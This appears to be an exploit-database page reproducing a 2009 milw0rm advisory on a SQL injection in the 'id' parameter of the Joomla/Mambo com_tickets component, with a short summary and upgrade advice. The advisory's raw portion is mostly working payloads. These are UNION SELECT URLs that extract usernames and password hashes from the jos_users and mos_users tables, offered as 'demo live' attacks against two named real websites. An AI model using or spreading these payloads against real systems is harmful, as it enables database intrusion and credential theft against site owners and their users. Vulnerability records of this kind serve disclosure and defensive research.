Joomla Component com_tickets (id) SQL-injection Vulnerability

vendor:

Tickets

by:

Chip D3 Bi0s

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: Tickets

Affected Version From: 0.1

Affected Version To: 2.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Joomla, Mambo

2009

Joomla Component com_tickets (id) SQL-injection Vulnerability

A vulnerability exists in Joomla Component com_tickets (id) which allows an attacker to inject arbitrary SQL commands via the 'id' parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is confirmed in version 0.1 and 2.1. Demo Live Joomla and Mambo versions are also provided.

Mitigation:

Upgrade to the latest version of Joomla Component com_tickets.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_tickets (id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability :  SQL injection 

###################################################

Info component:
Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
Name 		: Tickets
Version		: 0.1 & 2.1
Author		: Paul Coogan
Author email	: paul@ideabuzz.com
Web author 	: http://www.ideabuzz.com

###################################################

Example:
http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]

n = id valid


Demo Live Joomla : version 2.1
Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*

Demo Live Mambo : Version 0.1
Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-06-22]